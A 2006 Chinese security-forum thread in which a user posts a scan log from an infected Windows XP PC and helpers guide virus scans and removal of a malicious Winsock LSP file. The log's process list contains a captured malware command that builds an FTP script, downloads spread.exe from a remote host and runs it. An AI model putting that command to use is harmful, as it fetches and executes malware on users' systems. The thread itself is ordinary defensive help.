我的电脑前段时间中了一次严重的病毒，当时把瑞星都禁用了，注册表和一些文件也受了重创，杀毒后，系统倒是还能用，但好多进程都用着随病毒一起下来的一个文件，请看日志中的10项，并且svchost和瑞星监控用着大量的cpu，有劳大侠给分析一下
Logfile of Kaka v2. 0. 0. 9 Scan Module v2. 0. 0. 1
Scan saved at 16:54:18, on 2006-07-21
Platform: Microsoft Windows XP Professional Service Pack 1 (Build 2600)
MSIE: Internet Explorer v6.00 SP1; (6.00.2800.1106 (xpsp1.020828-1920))


Running processes:
[SMSS.EXE]
CommandLine =

[CSRSS.EXE]
CommandLine = C:\WINDOWS\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,3072,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ProfileControl=Off MaxRequestThreads=16

[WINLOGON.EXE]
CommandLine = winlogon.exe

[SERVICES.EXE]
CommandLine = C:\WINDOWS\system32\services.exe

[LSASS.EXE]
CommandLine = C:\WINDOWS\system32\lsass.exe

[SVCHOST.EXE]
CommandLine = C:\WINDOWS\system32\svchost -k rpcss

[SVCHOST.EXE]
CommandLine = C:\WINDOWS\System32\svchost.exe -k netsvcs

[SVCHOST.EXE]
CommandLine = C:\WINDOWS\System32\svchost.exe -k NetworkService

[CCenter.exe]
CommandLine = "C:\PROGRAM FILES\RISING\RAV\CCENTER.EXE"

[RavMonD.exe]
CommandLine = "C:\Program Files\Rising\Rav\Ravmond.exe"

[SPOOLSV.EXE]
CommandLine = C:\WINDOWS\system32\spoolsv.exe

[RavStub.exe]
CommandLine = "C:\Program Files\Rising\Rav\RavStub.exe" /RAVMOND

[EXPLORER.EXE]
CommandLine = C:\WINDOWS\Explorer.EXE

[RavTask.exe]
CommandLine = "C:\PROGRAM FILES\RISING\RAV\RAVTASK.EXE" -SYSTEM

[RavMon.exe]
CommandLine = "C:\Program Files\Rising\Rav\Ravmon.exe" -SYSTEM

[CTFMON.EXE]
CommandLine = "C:\WINDOWS\System32\ctfmon.exe"

[taskmgr.exe]
CommandLine = taskmgr.exe

[alg.exe]
CommandLine = C:\WINDOWS\System32\alg.exe

[nvsvc32.exe]
CommandLine = C:\WINDOWS\System32\nvsvc32.exe

[SVCHOST.EXE]
CommandLine = C:\WINDOWS\System32\svchost.exe -k imgsvc

[wdfmgr.exe]
CommandLine = C:\WINDOWS\System32\wdfmgr.exe

[QQ.EXE]
CommandLine = "D:\Program Files\Tencent\QQ\QQ.exe"

[TIMPlatform.exe]
CommandLine = "D:\Program Files\Tencent\QQ\TIMPlatform.exe" -Embedding

[KkScan.exe]
CommandLine = "c:\Program Files\Rising\KakaToolBar\KkScan.exe"

[avant.exe]
CommandLine = "F:\Program Files\Avant Browser\avant.exe"

[SVCHOST.EXE]
CommandLine = C:\WINDOWS\system32\svchost.exe -k LocalService

[cmd.exe]
CommandLine = cmd /c echo open spreadem.nowslate1703.info 21 >appmr.dll &echo user spread baby >>appmr.dll &echo binary >>appmr.dll &echo get >>appmr.dll &echo spread.exe >>appmr.dll &echo spread.exe >>appmr.dll &echo bye >>appmr.dll &ftp.exe -n -s:appmr.dll &del appmr.dll &spread.exe



R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page=http://www.hao123.com/
R3 - Default URLSearchHook is missing
O1 - Hosts: 127.0.0.1      localhost
O2 - BHO:  (file missing)
O2 - BHO:  (file missing)
O2 - BHO: bho Class - {ED8DFC5C-10EF-45AB-9DC2-0639AFF5A270} -  (file missing)
O3 - Toolbar: FlashGet Bar - {E0E899AB-F487-11D5-8D29-0050BA6940E3} - D:\PROGRA~1\FLASHGET\fgiebar.dll
O3 - Toolbar:  (file missing)
O3 - Toolbar: 电台(&R) - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: 卡卡上网安全助手 - {DB9ECD4F-FB8F-4311-B3CE-90B976C2707C} - C:\WINDOWS\System32\KakaTool.dll
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - HKLM\..\Run: [RavTask] "C:\Program Files\Rising\Rav\RavTask.exe" -system
O4 - HKLM\..\Run: [RavTimer] C:\PROGRA~1\RISING\RAV\RAVTIMER.EXE
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup
O4 - Startup: desktop.ini =
O4 - Startup: 腾讯QQ.lnk = D:\Program Files\Tencent\QQ\QQ.exe
O4 - Global Startup: desktop.ini =
O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office\OSA9.EXE
O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions present
O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O8 - Extra context menu item: 上传到QQ网络硬盘 - D:\Program Files\Tencent\QQ\AddToNetDisk.htm
O8 - Extra context menu item: 使用网际快车下载 - D:\Program Files\FlashGet\jc_link.htm
O8 - Extra context menu item: 使用网际快车下载全部链接 - D:\Program Files\FlashGet\jc_all.htm
O8 - Extra context menu item: 加入POCO网摘(&K) - http://my.poco.cn/fav/rightClick.php
O8 - Extra context menu item: 我的POCO网摘(&O) - http://my.poco.cn/fav/open_myfav.php
O8 - Extra context menu item: 添加到QQ自定义面板 - D:\Program Files\Tencent\QQ\AddPanel.htm
O8 - Extra context menu item: 添加到QQ表情 - D:\Program Files\Tencent\QQ\AddEmotion.htm
O8 - Extra context menu item: 用QQ彩信发送该图片 - D:\Program Files\Tencent\QQ\SendMMS.htm
O9 - Extra Button: @shdoclc.dll,-866 - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\System32\shdocvw.dll
O9 - Extra 'Tools' menuitem: @shdoclc.dll,-864 - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\System32\shdocvw.dll
O9 - Extra Button: QQ - {c95fe080-8f5d-11d2-a20b-00aa003c157b} - D:\Program Files\Tencent\QQ\QQ.EXE
O9 - Extra 'Tools' menuitem: 腾讯QQ - {c95fe080-8f5d-11d2-a20b-00aa003c157b} - D:\Program Files\Tencent\QQ\QQ.EXE
O9 - Extra Button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\MSMSGS.EXE
O9 - Extra 'Tools' menuitem: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\MSMSGS.EXE
O10 - Unknown file in Winsock LSP: C:\WINDOWS\System32\cn_spi.dll
O10 - Unknown file in Winsock LSP: C:\WINDOWS\System32\cn_spi.dll
O10 - Unknown file in Winsock LSP: C:\WINDOWS\System32\cn_spi.dll
O10 - Unknown file in Winsock LSP: C:\WINDOWS\System32\cn_spi.dll
O10 - Unknown file in Winsock LSP: C:\WINDOWS\System32\cn_spi.dll
O10 - Unknown file in Winsock LSP: C:\WINDOWS\System32\cn_spi.dll
O10 - Unknown file in Winsock LSP: C:\WINDOWS\System32\cn_spi.dll
O10 - Unknown file in Winsock LSP: C:\WINDOWS\System32\cn_spi.dll
O10 - Unknown file in Winsock LSP: C:\WINDOWS\System32\cn_spi.dll
O10 - Unknown file in Winsock LSP: C:\WINDOWS\System32\cn_spi.dll
O10 - Unknown file in Winsock LSP: C:\WINDOWS\System32\cn_spi.dll
O10 - Unknown file in Winsock LSP: C:\WINDOWS\System32\cn_spi.dll
O10 - Unknown file in Winsock LSP: C:\WINDOWS\System32\cn_spi.dll
O10 - Unknown file in Winsock LSP: C:\WINDOWS\System32\cn_spi.dll
O10 - Unknown file in Winsock LSP: C:\WINDOWS\System32\cn_spi.dll
O10 - Unknown file in Winsock LSP: C:\WINDOWS\System32\cn_spi.dll
O10 - Unknown file in Winsock LSP: C:\WINDOWS\System32\cn_spi.dll
O14 - IERESET.INF: START_PAGE_URL=http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome
O16 - DPF: DirectAnimation Java Classes - file://C:\WINDOWS\Java\classes\dajava.cab
O16 - DPF: {05C1004E-2596-48E5-8E26-39362985EEB9} (MMCPlayer Class) - http://p3p.sogou.com/MMCShell.cab
O16 - DPF: {12345678-1234-1234-1234-123456789011} - http://www.ads173.com/shipin/ray.exe
O16 - DPF: {B38870E4-7ECB-40DA-8C6A-595F0A5519FF} (MsnMessengerSetupDownloadControl Class) - http://messenger.msn.com/download/MsnMessengerSetupDownloader.cab
O16 - DPF: {D0A29C6C-AA71-4423-8C4A-5998B774C448} (IEDown Class) - http://download.ourgame.com/IEDown4.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{BFDE4DC3-1980-4FE9-9B02-34A94D5903F3}: NameServer = 202.99.160.68 202.99.168.8
O18 - Protocol: about - {3050F406-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\System32\mshtml.dll
O18 - Protocol: cdl - {3dd53d40-7b8b-11D0-b013-00aa0059ce02} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: dvd - {12D51199-0DB5-46FE-A120-47A3D7D937CC} - C:\WINDOWS\System32\msvidctl.dll
O18 - Protocol: file - {79eac9e7-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: ftp - {79eac9e3-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: gopher - {79eac9e4-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: http - {79eac9e2-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: https - {79eac9e5-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: ipp - (no CLSID) - (no file)
O18 - Protocol: its - {9D148291-B9C8-11D0-A4CC-0000F80149F6} - C:\WINDOWS\System32\itss.dll
O18 - Protocol: javascript - {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\System32\mshtml.dll
O18 - Protocol: local - {79eac9e7-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: mailto - {3050f3DA-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\System32\mshtml.dll
O18 - Protocol: mhtml - {05300401-BCBC-11d0-85E3-00C04FD85AB4} - C:\WINDOWS\System32\inetcomm.dll
O18 - Protocol: mk - {79eac9e6-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: ms-its - {9D148291-B9C8-11D0-A4CC-0000F80149F6} - C:\WINDOWS\System32\itss.dll
O18 - Protocol: msdaipp - (no CLSID) - (no file)
O18 - Protocol: msnim - {828030A1-22C1-4009-854F-8E305202313F} - "C:\PROGRA~1\MSNMES~1\msgrapp.dll"
O18 - Protocol: res - {3050F3BC-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\System32\mshtml.dll
O18 - Protocol: sysimage - {76E67A63-06E9-11D2-A840-006008059382} - C:\WINDOWS\System32\mshtml.dll
O18 - Protocol: tv - {CBD30858-AF45-11D2-B6D6-00C04FBBDE6E} - C:\WINDOWS\System32\msvidctl.dll
O18 - Protocol: vbscript - {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\System32\mshtml.dll
O18 - Protocol: vnd.ms.radio - {3DA2AA3B-3D96-11D2-9BD2-204C4F4F5020} - C:\WINDOWS\System32\msdxm.ocx
O18 - Protocol: wia - {13F3EA8B-91D7-4F0A-AD76-D2853AC8BECE} - C:\WINDOWS\System32\wiascr.dll
O23 - Service: Human Interface Device Access (HidServ) -  - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\System32\nvsvc32.exe
O23 - Service: Rising Process Communication Center (RsCCenter) - Beijing Rising Technology Co., Ltd. - C:\PROGRAM FILES\RISING\RAV\CCENTER.EXE
O23 - Service: RsRavMon Service (RsRavMon) - Beijing Rising Technology Co., Ltd. - "C:\Program Files\Rising\Rav\Ravmond.exe"
拜托了

【回复“直挂云帆济沧海”的帖子】
一步步来，请楼主别急，确认下问题。



请楼主使用下面的两个多引擎扫描器扫描下列文件：
C:\WINDOWS\System32\cn_spi.dll
多引擎扫描之Virustotal

http://www.virustotal.com/
多引擎扫描之Jotti

http://virusscan.jotti.org/


请务必将报告贴全。
使用方法请参考：
【推荐】多引擎扫描器的使用方法

http://forum.ikaka.com/topic.asp?board=67&artid=7957175
如果还有问题，请跟帖说明。

STATUS: QUEUEDYour file "cn_spi.dll" is queued in position: 6. Estimated start time is between 51 and 77 seconds.

Antivirus Version Update Result


Aditional Information

VirusTotal is a free service offered by Hispasec Sistemas. There are no guarantees about the availability and continuity of this service. Although the detection rate afforded by the use of multiple antivirus engines is far superior to that offered by just one product, these results DO NOT guarantee the harmlessness of a file. Currently, there is not any solution that offers a 100% effectiveness rate for detecting viruses and malware.

VirusTotalVirusTotal is a free file analisys service that works using several antivirus engines.


          Select file :            DistributeSSL

          Enter your email, choose the file to be scanned with multiple antivirus engines and click Send.Menu:
News Hot news in the virus/antivirus sector.
Estadisticas Statistics of VirusTotal procesing.
Virustotal More info about Virustotal.


STATUS: FINISHEDComplete scanning result of "cn_spi.dll", received in VirusTotal at 07.21.2006, 16:38:21 (CET).

Antivirus Version Update Result
AntiVir 6.35.0.21 07.21.2006 HEUR/Malware.Crypted.PSM
Authentium 4.93.8 07.20.2006  no virus found
Avast 4.7.844.0 07.19.2006  no virus found
AVG 386 07.21.2006  no virus found
BitDefender 7.2 07.21.2006  no virus found
CAT-QuickHeal 8.00 07.20.2006  no virus found
ClamAV devel-20060426 07.20.2006  no virus found
DrWeb 4.33 07.21.2006  no virus found
eTrust-InoculateIT 23.72.74 07.20.2006  no virus found
eTrust-Vet 12.6.2305 07.21.2006  no virus found
Ewido 4.0 07.21.2006  no virus found
Fortinet 2.77.0.0 07.21.2006 suspicious
F-Prot 3.16f 07.20.2006  no virus found
F-Prot4 4.2.1.29 07.20.2006  no virus found
Ikarus 0.2.65.0 07.21.2006 Backdoor.Win32.Hupigon.BV
Kaspersky 4.0.2.24 07.21.2006  no virus found
McAfee 4811 07.20.2006  no virus found
Microsoft 1.1508 07.21.2006  no virus found
NOD32v2 1.1672 07.21.2006  no virus found
Norman 5.90.23 07.21.2006  no virus found
Panda 9.0.0.4 07.21.2006 Suspicious file
Sophos 4.07.0 07.21.2006  no virus found
Symantec 8.0 07.21.2006  no virus found
TheHacker 5.9.8.179 07.21.2006  no virus found
UNA 1.83 07.20.2006  no virus found
VBA32 3.11.0 - suspected of Downloader.Small.74 (paranoid heuristics)
VirusBuster 4.3.7:9 07.21.2006 no virus found


Aditional Information
File size: 9679 bytes
MD5: a0a21130de072a42cf8a6517d52d21cb
SHA1: aaadb9361a4a1410c5d638fbc1226bdb77e0fe23
packers: NSPack, PE_Patch

VirusTotal is a free service offered by Hispasec Sistemas. There are no guarantees about the availability and continuity of this service. Although the detection rate afforded by the use of multiple antivirus engines is far superior to that offered by just one product, these results DO NOT guarantee the harmlessness of a file. Currently, there is not any solution that offers a 100% effectiveness rate for detecting viruses and malware.
> Ir a: Inicio Contactar En Español
--------------------------------------------------------------------------------
www.virustotal.com :: ©Hispasec Sistemas 2004-06:: e-mail info@virustotal.com 
我一点都看不懂，有劳各位大侠费心了

Jotti's malware scan 2.99-TRANSITION_TO_3.00-R1

File to upload & scan:           
Service 
Service load:  0%        100% 

File:  cn_spi.dll 
Status:  POSSIBLY INFECTED/MALWARE (Note: this file was only flagged as malware by heuristic detection(s). This might be a false positive. Therefore, results of this scan will not be stored in the database) 
MD5  a0a21130de072a42cf8a6517d52d21cb 
Packers detected:  NSPACK
Scanner results 
AntiVir  Found Heuristic/Malware.Crypted.PSM (probable variant) 
ArcaVir  Found nothing
Avast  Found nothing
AVG Antivirus  Found nothing
BitDefender  Found nothing
ClamAV  Found nothing
Dr.Web  Found nothing
F-Prot Antivirus  Found nothing
Fortinet  Found nothing
Kaspersky Anti-Virus  Found nothing
NOD32  Found nothing
Norman Virus Control  Found nothing
UNA  Found nothing
VirusBuster  Found nothing
VBA32  Found Downloader.Small.74 (paranoid heuristics) (probable variant) 
 
Powered by 
               
Disclaimer 
This service is by no means 100% safe. If this scanner says 'OK', it does not necessarily mean the file is clean. There could be a whole new virus on the loose. NEVER EVER rely on one single product only, not even this service, even though it utilizes several products. Therefore, We cannot and will not be held responsible for any damage caused by results presented by this non-profit online service.

Also, we are aware of the implications of a setup like this. We are sure this whole thing is by no means scientifically correct, since this is a fully automated service (although manual correction is possible). We are aware, in spite of efforts to proactively counter these, false positives might occur, for example. We do not consider this a very big issue, so please do not e-mail us about it. This is a simple online scan service, not the university of Wichita.

Scanning can take a while, since several scanners are being used, plus the fact some scanners use very high levels of (time consuming) heuristics. Scanners used are Linux versions, differences with Windows scanners may or may not occur. Another note: some scanners will only report one virus when scanning archives with multiple pieces of malware.

Virus definitions are updated every hour. There is a 15Mb limit per file. Please refrain from uploading tons of hex-edited or repacked variants of the same sample.

Please do not ask for viruses uploaded here, unless you work for an anti-virus vendor. They are not for trade. This is a legitimate service, not a VX site. Viruses uploaded here will be distributed to antivirus vendors without exception. Read more about this in our privacy policy. If you do not want your files to be distributed, please do not send them at all.

Sponsored by donations (in random order) from: Stormbyte Technologies LLC, The ClamAV project, James Love, Gideon Pertzov, Malcolm Murray, Nigel Thomas, Wendy Dickerson, Anthony Midmore, "ethereal", Mark Rubins, Steve S., Eric Johansen, Eric Schechter, Paul Bokel, Wilders Security, Wilfried Lilie, Prevx, SonicWALL, Lance Mueller, Ewido networks, and some people who prefer to remain anonymous... many thanks to all! 
 
Statistics 
Last file scanned at least one scanner reported something about: IPDbrute2.exe, detected by:

Scanner  Malware name 
AntiVir  SecurityPrivacyRisk/PSW.IpdBru.20.1 riskware 
ArcaVir  X 
Avast  X 
AVG Antivirus  X 
BitDefender  Backdoor.Ipdd.2.0 
ClamAV  X 
Dr.Web  Program.IpdBrute 
F-Prot Antivirus  X 
Fortinet  HackerTool/IpdBrute 
Kaspersky Anti-Virus  not-a-virus:PSWTool.Win32.IpdBrute.20 
NOD32  Win32/RiskWare.PSWTool.IPDBrute application 
Norman Virus Control  X 
UNA  Backdoor.IPDd.20 
VirusBuster  X 
VBA32  X 


You're free to (mis)interpret these automated, flawed statistics at your own discretion. For antivirus comparisons, visit AV comparatives
We are not affiliated with any third parties that conduct tests using this service.





Frequently asked questions - Feedback - Privacy policy

   

Page generated by JTPL

Copyright © 2004-2005 Jordi Bosveld <jotti@jotti.org>
这是用另外一个扫描的，一句话，不懂

C:\WINDOWS\System32\cn_spi.dll
这东东不如就灭掉它吧
请到http://forum.ikaka.com/topic.asp?board=67&artid=5188931，下载，LSPFix.exe，WinsockXPFix这两个软件
重新启动电脑, 开机检测完后, 按[F8]键(可以一直按到启动菜单出来为止), 选择安全模式进入Windows

运行LSPFix.exe
删除
cn_spi.dll
附说明一份
LSPFix.exe这个软件主要用来辅助修复HijackThis扫描发现的O10项。
使用时，请关闭所有IE界面和文件夹界面后运行LSPFix，运行后，把要修复的那一个O10项从左边转到右边，点“Finish”即可。（不过这之前，需要在“I know what I`m doing”前面打勾。）
双击我的电脑，工具，文件夹选项，查看，单击选取"显示隐藏文件或文件夹"清除"隐藏受保护的操作系统文件（推荐）"复选框。在提示确定更改时，单击“是”，清除“隐藏已知文件类型的扩展名
删除
C:\WINDOWS\System32\cn_spi.dll

修复后重启，如果无法上网，请运行WinsockXPFix，让它修复一下。
回到正常模式，请再扫日志粘上来。